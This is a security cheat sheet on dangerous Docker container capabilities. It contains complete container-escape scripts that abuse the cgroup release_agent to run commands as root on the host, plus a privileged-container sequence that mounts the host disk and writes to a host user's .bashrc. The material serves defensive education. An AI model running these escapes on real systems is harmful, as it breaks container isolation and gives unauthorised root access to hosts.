Application Security Cheat Sheet

Excessive Capabilities

Last updated 2 years ago

Running a Docker container with --privileged or dangerous capabilities allows privileged operations.

The --privileged flag gives all capabilities to the container, and it also lifts all the limitations enforced by the device cgroup controller. In other words, the container can then do almost everything that the host can do.

You can use the capsh command to see the granted capabilities:

$ capsh --print | grep Current
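
When capsh is not installed in the image, the same information can be read from the CapEff mask in /proc/self/status. The following is a minimal sketch, assuming a POSIX shell and the capability bit numbers from linux/capability.h (CAP_NET_RAW is bit 13, CAP_SYS_ADMIN is bit 21). The has_cap helper name is hypothetical and not part of any tool:

```shell
#!/bin/sh
# has_cap MASK BIT: succeeds when bit number BIT is set in the hex mask MASK
# (MASK is given without the 0x prefix, as it appears in /proc/<pid>/status).
has_cap() {
    [ $(( (0x$1 >> $2) & 1 )) -eq 1 ]
}

# Read the effective capability mask of the current process (Linux only).
if [ -r /proc/self/status ]; then
    cap_eff=$(awk '/^CapEff:/ { print $2 }' /proc/self/status)
    if [ -n "$cap_eff" ] && has_cap "$cap_eff" 21; then
        echo "CAP_SYS_ADMIN is granted"
    else
        echo "CAP_SYS_ADMIN is not granted"
    fi
fi
```

The bit test works on any mask copied from a status file, so it can also be applied to the CapEff value of another process.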

CAP_SYS_ADMIN

CAP_SYS_ADMIN is largely a catchall capability; it can easily lead to additional capabilities or full root (typically access to all capabilities). It is required to perform a range of administrative operations, which makes it difficult to drop from containers that perform privileged operations. Retaining this capability is often necessary for containers that mimic entire systems, whereas individual application containers can be more restrictive.

Abusing usermode helper API

Privileged containers can register usermode application helpers that are executed in the kernel context, that is, user-space applications that the kernel itself invokes.

The escape technique is based on abusing the functionality of the notify_on_release feature in cgroups v1 to run the exploit as a fully privileged root user.

Here is a version of the PoC, originally published by @_fel1x, that launches ps on the host:

# Finds + enables a cgroup release_agent
d=`dirname $(ls -x /s*/fs/c*/*/r* |head -n1)`
# Enables notify_on_release in the cgroup
mkdir -p $d/w; echo 1 > $d/w/notify_on_release
# Finds path of OverlayFS mount for container
# Unless the configuration explicitly exposes the mount point of the host filesystem
# see https://ajxchapman.github.io/containers/2020/11/19/privileged-container-escape.html
t=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
# Sets release_agent to /path/payload
touch /o; echo $t/c > $d/release_agent
# Creates a payload
echo "#!/bin/sh" > /c
echo "ps > $t/o" >> /c
chmod +x /c
# Triggers the cgroup via empty cgroup.procs
sh -c "echo 0 > $d/w/cgroup.procs"; sleep 1
# Reads the output
cat /o

Requirements to use this technique

The --privileged flag provides far more permissions than are needed to escape a Docker container via this method. The only requirements are:

  • You must be running as root inside the container.

  • The container must be run with the CAP_SYS_ADMIN Linux capability.

  • The container must lack an AppArmor profile, or otherwise allow the mount syscall.

  • The cgroup v1 virtual filesystem must be mounted read-write inside the container.
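
Two of the requirements above can be checked from inside the container before attempting anything else. This is a hedged sketch, assuming a POSIX shell with awk and id available. The function names is_root and cgroup_v1_rw are hypothetical, and the check only inspects mount options, not AppArmor or seccomp policy:

```shell
#!/bin/sh
# is_root: succeeds when the effective UID is 0.
is_root() {
    [ "$(id -u)" -eq 0 ]
}

# cgroup_v1_rw [MOUNTS_FILE]: succeeds if at least one cgroup v1 filesystem
# (fstype "cgroup", not "cgroup2") is mounted with the rw option.
cgroup_v1_rw() {
    awk '$3 == "cgroup" && $4 ~ /(^|,)rw(,|$)/ { found = 1 }
         END { exit !found }' "${1:-/proc/mounts}"
}

if [ -r /proc/mounts ]; then
    if is_root; then echo "root: yes"; else echo "root: no"; fi
    if cgroup_v1_rw; then
        echo "cgroup v1 read-write mount: yes"
    else
        echo "cgroup v1 read-write mount: no"
    fi
fi
```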

Using cgroups to deliver the exploit

The PoC abuses the functionality of the notify_on_release feature in cgroups v1 to run the exploit as a fully privileged root user.

When the last task in a cgroup leaves (by exiting or attaching to another cgroup), a command supplied in the release_agent file is executed. The intended use for this is to help prune abandoned cgroups. This command, when invoked, is run as a fully privileged root on the host.

If the notify_on_release flag is enabled in a cgroup, then whenever the last task in the cgroup leaves (exits or attaches to some other cgroup) and the last child cgroup of that cgroup is removed, the kernel runs the command specified by the contents of the release_agent file in that hierarchy's root directory, supplying the pathname (relative to the mount point of the cgroup file system) of the abandoned cgroup. This enables automatic removal of abandoned cgroups. The default value of notify_on_release in the root cgroup at system boot is disabled. The default value of other cgroups at creation is the current value of their parent's notify_on_release setting. The default value of a cgroup hierarchy's release_agent path is empty.
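
Because child cgroups inherit the flag from their parent, it can be useful to see which cgroups currently have it enabled. A minimal sketch, assuming a POSIX shell and a cgroup v1 hierarchy mounted somewhere under the directory passed in. The function name notify_enabled_cgroups is hypothetical:

```shell
#!/bin/sh
# notify_enabled_cgroups ROOT: prints every directory under ROOT whose
# notify_on_release file contains 1.
notify_enabled_cgroups() {
    find "$1" -type f -name notify_on_release 2>/dev/null |
    while IFS= read -r flag_file; do
        if [ "$(cat "$flag_file" 2>/dev/null)" = "1" ]; then
            dirname "$flag_file"
        fi
    done
}

# Inspect the usual mount location when it exists.
if [ -d /sys/fs/cgroup ]; then
    notify_enabled_cgroups /sys/fs/cgroup
fi
```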

Escape only with CAP_SYS_ADMIN capability

There is a simpler way to write this exploit so that it works without the --privileged flag. In this scenario, you won't have access to the read-write cgroup mount provided by --privileged. Instead, you mount the cgroup read-write yourself. This adds one extra line to the exploit but requires fewer privileges.

An example of a command to run the container on the host:

$ docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined ubuntu bash

The exploit below will execute a ps aux command on the host and save its output to the /output file in the container. It uses the same release_agent feature as the original PoC to execute on the host.

# Mounts the RDMA cgroup controller and creates a child cgroup
# This technique should work with the majority of cgroup controllers
# If you're following along and get "mount: /tmp/cgrp: special device cgroup does not exist"
# it's because your setup doesn't have the RDMA cgroup controller; try changing rdma to memory to fix it
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
# Enables cgroup notifications on release of the "x" cgroup
echo 1 > /tmp/cgrp/x/notify_on_release
# Finds path of OverlayFS mount for container
# Unless the configuration explicitly exposes the mount point of the host filesystem
# see https://ajxchapman.github.io/containers/2020/11/19/privileged-container-escape.html
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
# Sets release_agent to /path/payload
echo "$host_path/cmd" > /tmp/cgrp/release_agent
# Creates a payload
echo "#!/bin/sh" > /cmd
echo "ps aux > $host_path/output" >> /cmd
chmod a+x /cmd
# Executes the attack by spawning a process that immediately ends inside the "x" child cgroup
# By creating a /bin/sh process and writing its PID to the cgroup.procs file in "x" child cgroup directory
# The script on the host will execute after /bin/sh exits 
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
# Reads the output
cat /output
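
The sed step in both PoCs recovers the host-side path of the container's writable layer from the overlay mount options. The sketch below isolates that step so it can be tried on a sample line. It assumes a POSIX shell, matches the literal option name upperdir, and assumes another option follows upperdir in the line. The function name overlay_upperdir and the sample path in the comment are hypothetical:

```shell
#!/bin/sh
# overlay_upperdir [MTAB_FILE]: prints the value of the upperdir= mount option
# for every line that has one, for example
#   overlay / overlay rw,lowerdir=...,upperdir=/var/lib/docker/overlay2/abc/diff,workdir=... 0 0
# prints /var/lib/docker/overlay2/abc/diff
overlay_upperdir() {
    sed -n 's/.*upperdir=\([^,]*\).*/\1/p' "${1:-/etc/mtab}"
}

if [ -r /etc/mtab ]; then
    overlay_upperdir
fi
```

Files created at / inside the container appear under that directory on the host, which is why the payload path is built by prefixing it.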

Abusing exposed host directories

Assume that the host's /home directory is backed by the block device /dev/sdb1, which is visible from within a privileged container. In that case, you can create a device node for that block device, mount it inside the container, and gain access to the host's /home directory.

$ docker run --privileged -it --rm alpine:latest
/ $ apk update && apk add util-linux
# ...
/ $ lsblk
NAME      MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT
sda         8:0    0   45G  0 disk
├─sda1      8:1    0 40.9G  0 part /etc/hosts
├─sda2      8:2    0   16M  0 part
├─sda3      8:3    0    2G  0 part
│ └─vroot 253:0    0  1.2G  1 dm
├─sda4      8:4    0   16M  0 part
├─sda5      8:5    0    2G  0 part
├─sda6      8:6    0  512B  0 part
├─sda7      8:7    0  512B  0 part
├─sda8      8:8    0   16M  0 part
├─sda9      8:9    0  512B  0 part
├─sda10     8:10   0  512B  0 part
├─sda11     8:11   0    8M  0 part
└─sda12     8:12   0   32M  0 part
sdb         8:16   0    5G  0 disk
└─sdb1      8:17   0    5G  0 part
zram0     252:0    0  768M  0 disk [SWAP]
/ $ mknod /dev/sdb1 block 8 17
/ $ mkdir /mnt/host_home
/ $ mount /dev/sdb1 /mnt/host_home
/ $ echo 'echo "Hello from container land!" 2>&1' >> /mnt/host_home/eric_chiang_m/.bashrc
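
The major and minor numbers passed to mknod come from the MAJ:MIN column of lsblk. When lsblk is unavailable, sysfs exposes the same pair in /sys/class/block/NAME/dev. A minimal sketch, assuming a POSIX shell. The helper names dev_numbers and mknod_args are hypothetical, and the script only prints the command instead of running it:

```shell
#!/bin/sh
# dev_numbers NAME [SYSFS_DIR]: prints MAJ:MIN for a block device from sysfs.
dev_numbers() {
    cat "${2:-/sys/class/block}/$1/dev"
}

# mknod_args NAME MAJ:MIN: prints the mknod command line for a block device.
mknod_args() {
    printf 'mknod /dev/%s b %s %s\n' "$1" "${2%%:*}" "${2##*:}"
}

# Values taken from the lsblk output above.
mknod_args sdb1 8:17
```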

References:

  • Writeup: Privileged Containers Aren't Containers

CAP_SYS_MODULE

CAP_SYS_MODULE allows the process to load and unload arbitrary kernel modules (init_module(2), finit_module(2) and delete_module(2) system calls). This could lead to trivial privilege escalation and ring-0 compromise. The kernel can be modified at will, subverting all system security, Linux Security Modules, and container systems.

Docker drops CAP_SYS_MODULE by default. It is available only when it is granted explicitly or when the container is privileged.

References:

  • Writeup: How I Hacked Play-with-Docker and Remotely Ran Code on the Host

CAP_SYS_RAWIO

CAP_SYS_RAWIO provides a number of sensitive operations including access to /dev/mem, /dev/kmem or /proc/kcore, modifying mmap_min_addr, access to the ioperm(2) and iopl(2) system calls, and various disk commands. The FIBMAP ioctl(2) is also enabled via this capability, which has caused issues in the past. As per the man page, this also allows the holder to perform a range of device-specific operations on other devices.

CAP_NET_ADMIN

CAP_NET_ADMIN allows the capability holder to modify the exposed network namespaces' firewall, routing tables, socket permissions, network interface configuration and other related settings on exposed network interfaces. This also provides the ability to enable promiscuous mode for the attached network interfaces and potentially sniff across namespaces.

It should be noted that several privilege escalation vulnerabilities and other historical weaknesses have resulted from the ability to leverage this capability. These include CVE-2011-1019, which effectively granted the CAP_SYS_MODULE capability to load arbitrary modules and was exploited trivially using ifconfig; CVE-2010-4655, which resulted in a sensitive heap memory disclosure; and CVE-2013-4514, resulting in denial of service and possibly arbitrary code execution. These issues are largely due to the significant attack surface and implicit module loading for special interfaces or socket types.

CAP_SYS_CHROOT

CAP_SYS_CHROOT permits the use of the chroot(2) system call. This may allow escaping of any chroot(2) environment, using known weaknesses and escapes:

  • How to break out from various chroot solutions

  • chw00t: chroot escape tool

CAP_SYS_PTRACE

CAP_SYS_PTRACE allows the use of ptrace(2) and the cross memory attach system calls process_vm_readv(2) and process_vm_writev(2). If this capability is granted and the ptrace(2) system call itself is not blocked by a seccomp filter, this will allow an attacker to bypass other seccomp restrictions; see PoC for bypassing seccomp if ptrace is allowed.

References:

  • tbhaxor: Container Breakout – Part 1 (LAB: Process Injection)

CAP_NET_RAW

CAP_NET_RAW allows a process to create RAW and PACKET socket types for the available network namespaces. This allows arbitrary packet generation and transmission through the exposed network interfaces. In many cases this interface will be a virtual Ethernet device, which may allow a malicious or compromised container to spoof packets at various network layers. A malicious process or compromised container with this capability may inject into the upstream bridge, exploit routing between containers, bypass network access controls, and otherwise tamper with host networking if a firewall is not in place to limit the packet types and contents. Finally, this capability allows the process to bind to any address within the available namespaces. This capability is often retained by privileged containers to allow ping to function by using RAW sockets to create ICMP requests from a container.

Docker sets up container networking so that all containers share the same Linux virtual bridge. These containers will be able to communicate with each other. Even if this direct network access is disabled (using the --icc=false flag for Docker), containers are not restricted for link-layer traffic. In particular, it is possible (and in fact quite easy) to conduct an ARP spoofing attack on another container within the same host system, allowing full middle-person attacks of the targeted container's traffic.

CAP_SYS_BOOT

CAP_SYS_BOOT allows the use of the reboot(2) syscall. It also allows executing an arbitrary reboot command via LINUX_REBOOT_CMD_RESTART2, implemented for some specific hardware platforms.

This capability also permits use of the kexec_load(2) system call, which loads a new crash kernel, and, as of Linux 3.17, kexec_file_load(2), which also will load signed kernels.

CAP_SYSLOG

CAP_SYSLOG was finally forked in Linux 2.6.37 from the CAP_SYS_ADMIN catchall. This capability allows the process to use the syslog(2) system call. It also allows the process to view kernel addresses exposed via /proc and other interfaces when /proc/sys/kernel/kptr_restrict is set to 1.

The kptr_restrict sysctl setting was introduced in 2.6.38, and determines if kernel addresses are exposed. This defaults to zero (exposing kernel addresses) since 2.6.39 within the vanilla kernel, although many distributions correctly set the value to 1 (hide from everyone except uid 0) or 2 (always hide).

In addition, this capability also allows the process to view dmesg output if the dmesg_restrict setting is 1. Finally, the CAP_SYS_ADMIN capability is still permitted to perform syslog operations itself for historical reasons.

CAP_DAC_READ_SEARCH

CAP_DAC_READ_SEARCH allows a process to bypass file read, and directory read and execute permissions. While this was designed to be used for searching or reading files, it also grants the process permission to invoke open_by_handle_at(2). Any process with the capability CAP_DAC_READ_SEARCH can use open_by_handle_at(2) to gain access to any file, even files outside its mount namespace. The handle passed into open_by_handle_at(2) is intended to be an opaque identifier retrieved using name_to_handle_at(2). However, this handle contains sensitive and tamperable information, such as inode numbers. This was first shown to be an issue in Docker containers by Sebastian Krahmer with the shocker exploit.

Docker has mitigated this issue by dropping CAP_DAC_READ_SEARCH (as well as blocking access to open_by_handle_at using seccomp).

References

  • What does notify_on_release do?

  • Understanding and Hardening Linux Containers

  • Abusing Privileged and Unprivileged Linux Containers

  • Understanding Docker container escapes